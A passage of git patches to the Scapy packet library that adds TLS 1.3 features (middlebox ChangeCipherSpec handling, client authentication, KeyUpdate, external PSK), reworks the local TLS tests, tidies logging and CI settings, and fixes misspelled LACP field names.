-def test_tls_client(suite, version): +def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False): msg = ("TestC_%s_data" % suite).encode() # Run server q_ = Queue() print("Starting server...") - th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_)) + th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_, curve, cookie, client_auth)) th_.setDaemon(True) th_.start() # Synchronise threads @@ -204,42 +215,6 @@ def test_tls_client(suite, version): raise RuntimeError("Missing return value") return q_.get(timeout=5) - -def test_tls13_client(suite, retry=False): - msg = ("TestC_%s_data" % suite).encode() - # Run server - q_ = Queue() - print("Starting server...") - if retry: - # Run a server that support only secp256r1 and use cookie mechanism. - # It will send a HelloRetryRequest in response to a ClientHello - # with x25519 as default group. - curve = "secp256r1" - cookie = True - th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_, curve, cookie)) - else: - th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_)) - th_.setDaemon(True) - th_.start() - # Synchronise threads - print("Syncrhonising...") - assert q_.get(timeout=5) is True - time.sleep(1) - print("Thread synchronised") - # Run client - run_tls_test_client(msg, suite, "0304") - # Wait for server - print("Client running, waiting...") - th_.join(5) - if th_.is_alive(): - raise RuntimeError("Test timed out") - # Return values - if q_.empty(): - raise RuntimeError("Missing return value") - return q_.get(timeout=5) - - - = Testing TLS server and client with SSLv2 and SSL_CK_DES_192_EDE3_CBC_WITH_MD5 test_tls_client("0700c0", "0002") @@ -281,4 +256,9 @@ test_tls_client("1305", "0304") = Testing TLS server and client with TLS 1.3 and a retry ~ crypto_advanced -test_tls13_client("1302", retry=True) +test_tls_client("1302", "0304", curve="secp256r1", cookie=True) + += Testing TLS server and client with TLS 1.3 and TLS_AES_128_CCM_8_SHA256 and client auth +~ crypto_advanced + +test_tls_client("1305", "0304", client_auth=True) From 28f632534392403ae2822c2b40ba0563606ca4e8 Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 9 Apr 2020 00:20:50 +0200 Subject: [PATCH 0099/1632] TLSChangeCipherSpec middlebox in TLS1.3 & tests --- scapy/automaton.py | 5 +++- scapy/layers/tls/automaton_cli.py | 4 +-- scapy/layers/tls/automaton_srv.py | 47 +++++++++++++++++++++++-------- scapy/layers/tls/handshake.py | 7 ++++- scapy/layers/tls/record.py | 2 ++ scapy/layers/tls/record_tls13.py | 14 +++++++++ test/run_tests_py2.bat | 1 - test/run_tests_py3.bat | 1 - test/tls/tests_tls_netaccess.uts | 43 +++++++++++++++++++--------- 9 files changed, 93 insertions(+), 31 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index db56847c9a2..eb6f696f400 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -698,7 +698,10 @@ class CommandMessage(AutomatonException): # Services def debug(self, lvl, msg): if self.debug_level >= lvl: - log_interactive.debug(msg) + if conf.interactive: + log_interactive.debug(msg) + else: + print(msg) def send(self, pkt): if self.state.state in self.interception_points: diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 6e879bb3873..bf59c36f831 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -879,7 +879,7 @@ def tls13_should_add_ClientHello(self): c = 0x1301 else: c = self.ciphersuite - p = TLS13ClientHello(ciphers=self.ciphersuite, ext=ext) + p = TLS13ClientHello(ciphers=c, ext=ext) self.add_msg(p) raise self.TLS13_ADDED_CLIENTHELLO() @@ -1097,7 +1097,7 @@ def tls13_should_add_ClientCertificateVerify(self): def TLS13_ADDED_CERTIFICATEVERIFY(self): return self.tls13_should_add_ClientFinished() - @ATMT.condition(TLS13_PREPARE_CLIENTFLIGHT2) + @ATMT.condition(TLS13_PREPARE_CLIENTFLIGHT2, prio=2) def tls13_should_add_ClientFinished(self): self.add_msg(TLSFinished()) raise self.TLS13_ADDED_CLIENTFINISHED() diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index a0da1f9ee4d..625d6dd0e08 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -641,6 +641,27 @@ def tls13_ADDED_SERVERFINISHED(self): @ATMT.condition(tls13_ADDED_SERVERFINISHED) def tls13_should_send_ServerFlight1(self): self.flush_records() + raise self.tls13_HANDLED_SERVERFLIGHT1() + + @ATMT.state() + def tls13_HANDLED_SERVERFLIGHT1(self): + pass + + @ATMT.condition(tls13_HANDLED_SERVERFLIGHT1, prio=1) + def tls13_should_handle_ChangeCipherSpec(self): + self.raise_on_packet(TLSChangeCipherSpec, + self.tls13_HANDLED_CHANGECIPHERSPEC) + + @ATMT.state() + def tls13_HANDLED_CHANGECIPHERSPEC(self): + pass + + @ATMT.condition(tls13_HANDLED_SERVERFLIGHT1, prio=2) + def tls13_missing_ChangeCipherSpec(self): + raise self.tls13_WAITING_CLIENTFLIGHT2() + + @ATMT.condition(tls13_HANDLED_CHANGECIPHERSPEC) + def tls13_should_wait_ClientFlight2(self): raise self.tls13_WAITING_CLIENTFLIGHT2() @ATMT.state() @@ -650,19 +671,19 @@ def tls13_WAITING_CLIENTFLIGHT2(self): @ATMT.state() def tls13_RECEIVED_CLIENTFLIGHT2(self): - print("tls13_RECEIVED_CLIENTFLIGHT2") pass @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=1) def tls13_should_handle_ClientFlight2(self): - print("tls13_should_handle_ClientFinished") + self.raise_on_packet(TLS13Certificate, + self.TLS13_HANDLED_CLIENTCERTIFICATE) + + @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=2) + def tls13_no_ClientCertificate(self): if self.client_auth: - print("raise_on_packet(TLS13Certificate") - self.raise_on_packet(TLS13Certificate, - self.TLS13_HANDLED_CLIENTCERTIFICATE) - else: - self.raise_on_packet(TLSFinished, - self.TLS13_HANDLED_CLIENTFINISHED) + raise self.TLS13_MISSING_CLIENTCERTIFICATE() + self.raise_on_packet(TLSFinished, + self.TLS13_HANDLED_CLIENTFINISHED) # RFC8446, section 4.4.2.4 : # "If the client does not send any certificates (i.e., it sends an empty @@ -674,9 +695,9 @@ def tls13_should_handle_ClientFlight2(self): def TLS13_HANDLED_CLIENTCERTIFICATE(self): if self.client_auth: self.vprint("Received client certificate chain...") - self.vprint(self.cur_pkt.show()) if isinstance(self.cur_pkt, TLS13Certificate): if self.cur_pkt.certslen == 0: + self.vprint("but it's empty !") raise self.TLS13_MISSING_CLIENTCERTIFICATE() @ATMT.condition(TLS13_HANDLED_CLIENTCERTIFICATE) @@ -699,11 +720,15 @@ def tls13_should_handle_ClientFinished(self): self.raise_on_packet(TLSFinished, self.TLS13_HANDLED_CLIENTFINISHED) - # TODO : change alert code @ATMT.state() def TLS13_MISSING_CLIENTCERTIFICATE(self): self.vprint("Missing ClientCertificate!") - raise self.CLOSE_NOTIFY() + self.add_record() + self.add_msg(TLSAlert(level=2, descr=0x74)) + self.flush_records() + self.vprint("Sending TLSAlert 116") + self.socket.close() + raise self.WAITING_CLIENT() @ATMT.state() def TLS13_HANDLED_CLIENTFINISHED(self): diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 7505ab875de..86bb6614527 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -55,6 +55,7 @@ from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes + ############################################################################### # Generic TLS Handshake message # ############################################################################### @@ -295,6 +296,10 @@ def tls_session_update(self, msg_str): s = self.tls_session s.advertised_tls_version = self.version + # This ClientHello could be a 1.3 one. Let's store the sid + # in all cases + if self.sidlen and self.sidlen > 0: + s.sid = self.sid self.random_bytes = msg_str[10:38] s.client_random = (struct.pack('!I', self.gmt_unix_time) + self.random_bytes) @@ -306,7 +311,6 @@ def tls_session_update(self, msg_str): for e in self.ext: if isinstance(e, TLS_Ext_SupportedVersion_CH): s.advertised_tls_version = e.versions[0] - if isinstance(e, TLS_Ext_SignatureAlgorithms): s.advertised_sig_algs = e.sig_algs @@ -1060,6 +1064,7 @@ class TLS13CertificateRequest(_TLSHandshake): # ServerHelloDone # ############################################################################### + class TLSServerHelloDone(_TLSHandshake): name = "TLS Handshake - Server Hello Done" fields_desc = [ByteEnumField("msgtype", 14, _tls_handshake_type), diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index cbebc47b5d3..d258a7dc270 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -140,6 +140,8 @@ def getfield(self, pkt, s): if (((pkt.tls_session.tls_version or 0x0303) > 0x0200) and hasattr(pkt, "type") and pkt.type == 23): return ret, [TLSApplicationData(data=b"")] + elif hasattr(pkt, "type") and pkt.type == 20: + return ret, [TLSChangeCipherSpec()] else: return ret, [Raw(load=b"")] diff --git a/scapy/layers/tls/record_tls13.py b/scapy/layers/tls/record_tls13.py index 7e2211092e9..deb7478ccfa 100644 --- a/scapy/layers/tls/record_tls13.py +++ b/scapy/layers/tls/record_tls13.py @@ -61,6 +61,16 @@ def pre_dissect(self, s): return s +class TLSInnerChangeCipherSpec(_GenericTLSSessionInheritance): + __slots__ = ["type"] + name = "TLS Inner Plaintext (CCS)" + fields_desc = [_TLSMsgListField("msg", [], length_from=lambda x: 1)] + + def __init__(self, _pkt=None, *args, **kwargs): + self.type = 0x14 + super(TLSInnerChangeCipherSpec, self).__init__(_pkt, *args, **kwargs) + + class _TLSInnerPlaintextField(PacketField): def __init__(self, name, default, *args, **kargs): super(_TLSInnerPlaintextField, self).__init__(name, @@ -68,9 +78,13 @@ def __init__(self, name, default, *args, **kargs): TLSInnerPlaintext) def m2i(self, pkt, m): + if pkt.type == 0x14: + return TLSInnerChangeCipherSpec(m, tls_session=pkt.tls_session) return self.cls(m, tls_session=pkt.tls_session) def getfield(self, pkt, s): + if pkt.type == 0x14: + return super(_TLSInnerPlaintextField, self).getfield(pkt, s) tag_len = pkt.tls_session.rcs.mac_len frag_len = pkt.len - tag_len if frag_len < 1: diff --git a/test/run_tests_py2.bat b/test/run_tests_py2.bat index 385b2f8eacd..2c29eb72a23 100644 --- a/test/run_tests_py2.bat +++ b/test/run_tests_py2.bat @@ -9,4 +9,3 @@ if [%1]==[] ( ) else ( python "%MYDIR%\scapy\tools\UTscapy.py" %* ) -PAUSE \ No newline at end of file diff --git a/test/run_tests_py3.bat b/test/run_tests_py3.bat index ea5961315b8..56049075aab 100644 --- a/test/run_tests_py3.bat +++ b/test/run_tests_py3.bat @@ -9,4 +9,3 @@ if [%1]==[] ( ) else ( python3 "%MYDIR%\scapy\tools\UTscapy.py" %* ) -PAUSE \ No newline at end of file diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 3dd3f110636..ad88b5c77d8 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -7,6 +7,7 @@ ############ ############ + TLS server automaton tests +~ server ### DISCLAIMER: Those tests are slow ### @@ -60,15 +61,17 @@ def check_output_for_data(out, err, expected_data): else: return (False, None) +def get_file(filename): + return os.getenv("SCAPY_ROOT_DIR")+filename if not os.path.exists(filename) else filename + + def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth=False): correct = False print("Server started !") with captured_output() as (out, err): # Prepare automaton - filename = "/test/tls/pki/srv_cert.pem" - mycert = os.getenv("SCAPY_ROOT_DIR")+filename if not os.path.exists(filename) else filename - filename = "/test/tls/pki/srv_key.pem" - mykey = os.getenv("SCAPY_ROOT_DIR")+filename if not os.path.exists(filename) else filename + mycert = get_file("/test/tls/pki/srv_cert.pem") + mykey = get_file("/test/tls/pki/srv_key.pem") print(os.environ["SCAPY_ROOT_DIR"]) print(mykey) print(mycert) @@ -100,18 +103,27 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False): q_.get() time.sleep(1) # Run client - filename = "/test/tls/pki/ca_cert.pem" - filename = os.getenv("SCAPY_ROOT_DIR")+filename if not os.path.exists(filename) else filename - CA_f = os.path.abspath(filename) + CA_f = get_file("/test/tls/pki/ca_cert.pem") + mycert = get_file("/test/tls/pki/cli_cert.pem") + mykey = get_file("/test/tls/pki/cli_key.pem") + args = [ + "openssl", "s_client", + "-connect", "127.0.0.1:4433", "-debug", + "-ciphersuites" if tls13 else "-cipher", suite, + version, + "-CAfile", CA_f + ] + if client_auth: + args.extend(["-cert", mycert, "-key", mykey]) p = subprocess.Popen( - ["openssl", "s_client", "-connect", "127.0.0.1:4433", "-debug", "-ciphersuites" if tls13 else "-cipher", suite, version, "-CAfile", CA_f], + args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) msg += b"\nstop_server\n" out = p.communicate(input=msg)[0] print(out.decode()) if p.returncode != 0: - raise RuntimeError("OpenSSL returned with error code") + raise RuntimeError("OpenSSL returned with error code %s" % p.returncode) else: p = re.compile(br'verify return:(\d+)') _failed = False @@ -165,6 +177,7 @@ test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True) test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True, client_auth=True) + TLS client automaton tests +~ client = Load client utils functions @@ -177,16 +190,18 @@ from scapy.modules.six.moves.queue import Queue send_data = cipher_suite_code = version = None -def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None): +def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None, client_auth=False): print("Loading client...") + mycert = get_file("/test/tls/pki/cli_cert.pem") if client_auth else None + mykey = get_file("/test/tls/pki/cli_key.pem") if client_auth else None if version == "0002": - t = TLSClientAutomaton(data=[send_data, b"stop_server", b"quit"], version="sslv2", debug=5) + t = TLSClientAutomaton(data=[send_data, b"stop_server", b"quit"], version="sslv2", debug=5, mycert=mycert, mykey=mykey) elif version == "0304": ch = TLS13ClientHello(ciphers=int(cipher_suite_code, 16)) - t = TLSClientAutomaton(client_hello=ch, data=[send_data, b"stop_server", b"quit"], version="tls13", debug=5) + t = TLSClientAutomaton(client_hello=ch, data=[send_data, b"stop_server", b"quit"], version="tls13", debug=5, mycert=mycert, mykey=mykey) else: ch = TLSClientHello(version=int(version, 16), ciphers=int(cipher_suite_code, 16)) - t = TLSClientAutomaton(client_hello=ch, data=[send_data, b"stop_server", b"quit"], debug=5) + t = TLSClientAutomaton(client_hello=ch, data=[send_data, b"stop_server", b"quit"], debug=5, mycert=mycert, mykey=mykey) print("Running client...") t.run() @@ -204,7 +219,7 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False) time.sleep(1) print("Thread synchronised") # Run client - run_tls_test_client(msg, suite, version) + run_tls_test_client(msg, suite, version, client_auth) # Wait for server print("Client running, waiting...") th_.join(5) From 6448539533267e6a7659eb42da45bbe73bdfe90c Mon Sep 17 00:00:00 2001 From: gpotter Date: Sat, 11 Apr 2020 23:04:23 +0200 Subject: [PATCH 0100/1632] Pin bionic on travis --- .travis.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.travis.yml b/.travis.yml index e335a067742..1006c992080 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,4 +1,5 @@ language: python +dist: bionic # OpenSSL 1.1.1 cache: directories: - $HOME/.cache/pip From 6ff0df502aacb4293ebe57b3ff558f251961b90e Mon Sep 17 00:00:00 2001 From: gpotter Date: Sat, 11 Apr 2020 23:46:10 +0200 Subject: [PATCH 0101/1632] Fix Travis Bionic tests --- .travis.yml | 2 +- test/regression.uts | 5 ++++- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/.travis.yml b/.travis.yml index 1006c992080..570a7001a36 100644 --- a/.travis.yml +++ b/.travis.yml @@ -14,7 +14,7 @@ jobs: - TOXENV=py27-linux_root,codecov - os: linux - python: pypy + python: pypy2 env: - TOXENV=pypy-linux_root,codecov diff --git a/test/regression.uts b/test/regression.uts index ada7efc5b3c..a766020879e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -223,7 +223,10 @@ else: = Test read_routes6() - check mandatory routes -if len(routes6) > 1 and not WINDOWS: +conf.route6 + +# Doesn't pass on Travis Bionic XXX +if len(routes6) > 2 and not WINDOWS: assert(sum(1 for r in routes6 if r[0] == "::1" and r[4] == ["::1"]) >= 1) if not OPENBSD and len(iflist) >= 2: assert sum(1 for r in routes6 if r[0] == "fe80::" and r[1] == 64) >= 1 From 2b7a431c3a75102fa1095bda70d376940b344276 Mon Sep 17 00:00:00 2001 From: gpotter Date: Fri, 17 Apr 2020 19:25:59 +0200 Subject: [PATCH 0102/1632] Instantiate logger in UTscapy --- scapy/automaton.py | 7 ++----- scapy/tools/UTscapy.py | 16 +++++++++------- 2 files changed, 11 insertions(+), 12 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index eb6f696f400..1ff1705477e 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -20,7 +20,7 @@ import threading from scapy.config import conf from scapy.utils import do_graph -from scapy.error import log_interactive, warning +from scapy.error import log_runtime, warning from scapy.plist import PacketList from scapy.data import MTU from scapy.supersocket import SuperSocket @@ -698,10 +698,7 @@ class CommandMessage(AutomatonException): # Services def debug(self, lvl, msg): if self.debug_level >= lvl: - if conf.interactive: - log_interactive.debug(msg) - else: - print(msg) + log_runtime.debug(msg) def send(self, pkt): if self.state.state in self.interception_points: diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 2aeb7264453..30ad842b37e 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -7,17 +7,18 @@ Unit testing infrastructure for Scapy """ -from __future__ import absolute_import from __future__ import print_function -import sys +import bz2 +import copy +import code import getopt import glob -import importlib import hashlib -import copy -import code -import bz2 +import importlib +import json +import logging import os.path +import sys import time import traceback import warnings @@ -284,7 +285,6 @@ def parse_config_file(config_path, verb=3): } """ - import json with open(config_path) as config_file: data = json.load(config_file) if verb > 2: @@ -857,6 +857,8 @@ def resolve_testfiles(TESTFILES): def main(): argv = sys.argv[1:] + logger = logging.getLogger("scapy") + logger.addHandler(logging.StreamHandler()) ignore_globals = list(six.moves.builtins.__dict__) # Parse arguments From 551ab1ab327ad4dd596fe51807dc136090ee00a4 Mon Sep 17 00:00:00 2001 From: rperez Date: Tue, 3 Sep 2019 10:31:57 +0200 Subject: [PATCH 0103/1632] add KeyUpdate --- scapy/layers/tls/automaton_cli.py | 9 ++++++++- scapy/layers/tls/automaton_srv.py | 16 ++++++++++++++-- scapy/layers/tls/handshake.py | 19 +++++++++++++++++++ 3 files changed, 41 insertions(+), 3 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index bf59c36f831..52966c29f4c 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -35,7 +35,7 @@ TLSEncryptedExtensions, TLSFinished, TLSServerHello, TLSServerHelloDone, \ TLSServerKeyExchange, TLS13Certificate, TLS13ClientHello, \ TLS13ServerHello, TLS13HelloRetryRequest, TLS13CertificateRequest, \ - _ASN1CertAndExt + _ASN1CertAndExt, TLS13KeyUpdate from scapy.layers.tls.handshake_sslv2 import SSLv2ClientHello, \ SSLv2ServerHello, SSLv2ClientMasterKey, SSLv2ServerVerify, \ SSLv2ClientFinished, SSLv2ServerFinished, SSLv2ClientCertificate, \ @@ -496,6 +496,13 @@ def add_ClientData(self): data = self.data_to_send.pop() if data == b"quit": return + # Command to perform a key_update (for a TLS 1.3 session) + elif data == b"key_update": + if self.cur_session.tls_version >= 0x0304: + self.add_record() + self.add_msg(TLS13KeyUpdate(request_update="update_requested")) + raise self.ADDED_CLIENTDATA() + if self.linebreak: data += b"\n" self.add_record() diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 625d6dd0e08..1129fbeffbd 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -37,7 +37,8 @@ TLSCertificateVerify, TLSClientHello, TLSClientKeyExchange, TLSFinished, \ TLSServerHello, TLSServerHelloDone, TLSServerKeyExchange, \ _ASN1CertAndExt, TLS13ServerHello, TLS13Certificate, TLS13ClientHello, \ - TLSEncryptedExtensions, TLS13HelloRetryRequest, TLS13CertificateRequest + TLSEncryptedExtensions, TLS13HelloRetryRequest, TLS13CertificateRequest, \ + TLS13KeyUpdate from scapy.layers.tls.handshake_sslv2 import SSLv2ClientCertificate, \ SSLv2ClientFinished, SSLv2ClientHello, SSLv2ClientMasterKey, \ SSLv2RequestCertificate, SSLv2ServerFinished, SSLv2ServerHello, \ @@ -145,11 +146,16 @@ def http_sessioninfo(self): s += "Version : %s\n" % v cs = self.cur_session.wcs.ciphersuite.name s += "Cipher suite : %s\n" % cs - ms = self.cur_session.master_secret + if self.cur_session.tls_version < 0x0304: + ms = self.cur_session.master_secret + else: + ms = self.cur_session.tls13_master_secret + s += "Master secret : %s\n" % repr_hex(ms) body = "
%s
\r\n\r\n" % s answer = (header + body) % len(body) return answer + return answer @ATMT.state(initial=True) def INITIAL(self): @@ -768,6 +774,12 @@ def should_handle_ClientData(self): elif isinstance(p, TLSAlert): print("> Received: %r" % p) raise self.CLOSE_NOTIFY() + elif isinstance(p, TLS13KeyUpdate): + print("> Received: %r" % p) + p = TLS13KeyUpdate(request_update=0) + self.add_record() + self.add_msg(p) + raise self.ADDED_SERVERDATA() else: print("> Received: %r" % p) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 86bb6614527..9e7cdf8afd1 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -1511,6 +1511,25 @@ class TLS13KeyUpdate(_TLSHandshake): ThreeBytesField("msglen", None), ByteEnumField("request_update", 0, _key_update_request)] + def post_build_tls_session_update(self, msg_str): + s = self.tls_session + s.pwcs = writeConnState(ciphersuite=type(s.wcs.ciphersuite), + connection_end=s.connection_end, + tls_version=s.tls_version) + s.triggered_pwcs_commit = True + s.compute_tls13_next_traffic_secrets(s.connection_end, "write") + + def post_dissection_tls_session_update(self, msg_str): + s = self.tls_session + s.prcs = writeConnState(ciphersuite=type(s.rcs.ciphersuite), + connection_end=s.connection_end, + tls_version=s.tls_version) + s.triggered_prcs_commit = True + if s.connection_end == "server": + s.compute_tls13_next_traffic_secrets("client", "read") + elif s.connection_end == "client": + s.compute_tls13_next_traffic_secrets("server", "read") + ############################################################################### # All handshake messages defined in this module # From d38921077f138c21dcd58b7870fef2074f090ace Mon Sep 17 00:00:00 2001 From: "Bryan Benson (SDE)" Date: Fri, 17 Apr 2020 11:48:50 -0700 Subject: [PATCH 0104/1632] Correct spelling of colletctor_reserved to collector_reserved and numer to number in actor_port_numer & partner_port_numer within the LACP handler. --- scapy/contrib/lacp.py | 11 ++++++++--- test/contrib/lacp.uts | 4 ++-- 2 files changed, 10 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/lacp.py b/scapy/contrib/lacp.py index 2a69d6a93ee..3d63f96921f 100644 --- a/scapy/contrib/lacp.py +++ b/scapy/contrib/lacp.py @@ -39,6 +39,11 @@ class SlowProtocol(Packet): class LACP(Packet): name = "LACP" + deprecated_fields = { + "actor_port_numer": ("actor_port_number", "2.4.4"), + "partner_port_numer": ("partner_port_number", "2.4.4"), + "colletctor_reserved": ("collector_reserved", "2.4.4"), + } fields_desc = [ ByteField("version", 1), ByteField("actor_type", 1), @@ -47,7 +52,7 @@ class LACP(Packet): MACField("actor_system", None), ShortField("actor_key", 0), ShortField("actor_port_priority", 0), - ShortField("actor_port_numer", 0), + ShortField("actor_port_number", 0), ByteField("actor_state", 0), XStrFixedLenField("actor_reserved", "", 3), ByteField("partner_type", 2), @@ -56,13 +61,13 @@ class LACP(Packet): MACField("partner_system", None), ShortField("partner_key", 0), ShortField("partner_port_priority", 0), - ShortField("partner_port_numer", 0), + ShortField("partner_port_number", 0), ByteField("partner_state", 0), XStrFixedLenField("partner_reserved", "", 3), ByteField("collector_type", 3), ByteField("collector_length", 16), ShortField("collector_max_delay", 0), - XStrFixedLenField("colletctor_reserved", "", 12), + XStrFixedLenField("collector_reserved", "", 12), ByteField("terminator_type", 0), ByteField("terminator_length", 0), XStrFixedLenField("reserved", "", 50), diff --git a/test/contrib/lacp.uts b/test/contrib/lacp.uts index 63ef27d066a..435c7dda30c 100644 --- a/test/contrib/lacp.uts +++ b/test/contrib/lacp.uts @@ -13,13 +13,13 @@ params = dict( actor_system='00:13:c4:12:0f:00', actor_key=13, actor_port_priority=32768, - actor_port_numer=22, + actor_port_number=22, actor_state=0x85, partner_system_priority=32768, partner_system='00:0e:83:16:f5:00', partner_key=13, partner_port_priority=32768, - partner_port_numer=25, + partner_port_number=25, partner_state=0x36, collector_max_delay=32768, ) From 7839ca942ddb034b11ac42565c1143c27cda9cfc Mon Sep 17 00:00:00 2001 From: rperez Date: Wed, 4 Sep 2019 13:44:39 +0200 Subject: [PATCH 0105/1632] Add external PSK + middlebox compatibility --- scapy/layers/tls/automaton.py | 9 ++- scapy/layers/tls/automaton_cli.py | 123 +++++++++++++++++++++++------- scapy/layers/tls/automaton_srv.py | 107 ++++++++++++++++++-------- scapy/layers/tls/handshake.py | 116 ++++++++++++++++++++++++---- scapy/layers/tls/record.py | 7 +- scapy/layers/tls/record_tls13.py | 14 ---- scapy/layers/tls/session.py | 4 + test/tls/example_client.py | 44 ++++++++--- test/tls/example_server.py | 13 +++- test/tls/tests_tls_netaccess.uts | 70 ++++++++++++----- 10 files changed, 382 insertions(+), 125 deletions(-) diff --git a/scapy/layers/tls/automaton.py b/scapy/layers/tls/automaton.py index 3b951fe42ee..6c4748ae410 100644 --- a/scapy/layers/tls/automaton.py +++ b/scapy/layers/tls/automaton.py @@ -200,11 +200,11 @@ def raise_on_packet(self, pkt_cls, state, get_next_msg=True): self.buffer_in = self.buffer_in[1:] raise state() - def add_record(self, is_sslv2=None, is_tls13=None): + def add_record(self, is_sslv2=None, is_tls13=None, is_tls12=None): """ Add a new TLS or SSLv2 or TLS 1.3 record to the packets buffered out. """ - if is_sslv2 is None and is_tls13 is None: + if is_sslv2 is None and is_tls13 is None and is_tls12 is None: v = (self.cur_session.tls_version or self.cur_session.advertised_tls_version) if v in [0x0200, 0x0002]: @@ -215,6 +215,11 @@ def add_record(self, is_sslv2=None, is_tls13=None): self.buffer_out.append(SSLv2(tls_session=self.cur_session)) elif is_tls13: self.buffer_out.append(TLS13(tls_session=self.cur_session)) + # For TLS 1.3 middlebox compatibility, TLS record version must + # be 0x0303 + elif is_tls12: + self.buffer_out.append(TLS(version="TLS 1.2", + tls_session=self.cur_session)) else: self.buffer_out.append(TLS(tls_session=self.cur_session)) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 52966c29f4c..8c3ada4eb0c 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -19,6 +19,7 @@ from __future__ import print_function import socket +import binascii from scapy.config import conf from scapy.pton_ntop import inet_pton @@ -29,7 +30,7 @@ from scapy.layers.tls.session import tlsSession from scapy.layers.tls.extensions import TLS_Ext_SupportedGroups, \ TLS_Ext_SupportedVersion_CH, TLS_Ext_SignatureAlgorithms, \ - TLS_Ext_SupportedVersion_SH + TLS_Ext_SupportedVersion_SH, TLS_Ext_PSKKeyExchangeModes from scapy.layers.tls.handshake import TLSCertificate, TLSCertificateRequest, \ TLSCertificateVerify, TLSClientHello, TLSClientKeyExchange, \ TLSEncryptedExtensions, TLSFinished, TLSServerHello, TLSServerHelloDone, \ @@ -41,11 +42,13 @@ SSLv2ClientFinished, SSLv2ServerFinished, SSLv2ClientCertificate, \ SSLv2RequestCertificate from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_KeyShare_CH, \ - KeyShareEntry, TLS_Ext_KeyShare_HRR + KeyShareEntry, TLS_Ext_KeyShare_HRR, PSKIdentity, PSKBinderEntry, \ + TLS_Ext_PreSharedKey_CH from scapy.layers.tls.record import TLSAlert, TLSChangeCipherSpec, \ TLSApplicationData from scapy.layers.tls.crypto.suites import _tls_cipher_suites from scapy.layers.tls.crypto.groups import _tls_named_groups +from scapy.layers.tls.crypto.hkdf import TLS13_HKDF from scapy.modules import six from scapy.packet import Raw from scapy.compat import bytes_encode @@ -73,6 +76,7 @@ class TLSClientAutomaton(_TLSAutomaton): def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, mycert=None, mykey=None, client_hello=None, version=None, + psk=None, psk_mode=None, data=None, ciphersuite=None, curve=None, @@ -138,6 +142,8 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, else: # Or secp256r1 otherwise self.curve = 23 + self.tls13_psk_secret = psk + self.tls13_psk_mode = psk_mode if curve is not None: for (group_id, ng) in _tls_named_groups.items(): if ng == curve: @@ -171,14 +177,19 @@ def INITIAL(self): @ATMT.state() def INIT_TLS_SESSION(self): self.cur_session = tlsSession(connection_end="client") - self.cur_session.client_certs = self.mycert - self.cur_session.client_key = self.mykey + s = self.cur_session + s.client_certs = self.mycert + s.client_key = self.mykey v = self.advertised_tls_version if v: - self.cur_session.advertised_tls_version = v + s.advertised_tls_version = v else: - default_version = self.cur_session.advertised_tls_version + default_version = s.advertised_tls_version self.advertised_tls_version = default_version + + if s.advertised_tls_version >= 0x0304: + if self.tls13_psk_secret: + s.tls13_psk_secret = binascii.unhexlify(self.tls13_psk_secret) raise self.CONNECT() @ATMT.state() @@ -872,21 +883,47 @@ def tls13_should_add_ClientHello(self): if conf.crypto_valid_advanced: supported_groups.append("x25519") self.add_record(is_tls13=False) - ext = [TLS_Ext_SupportedVersion_CH(versions=["TLS 1.3"]), - TLS_Ext_SupportedGroups(groups=supported_groups), - 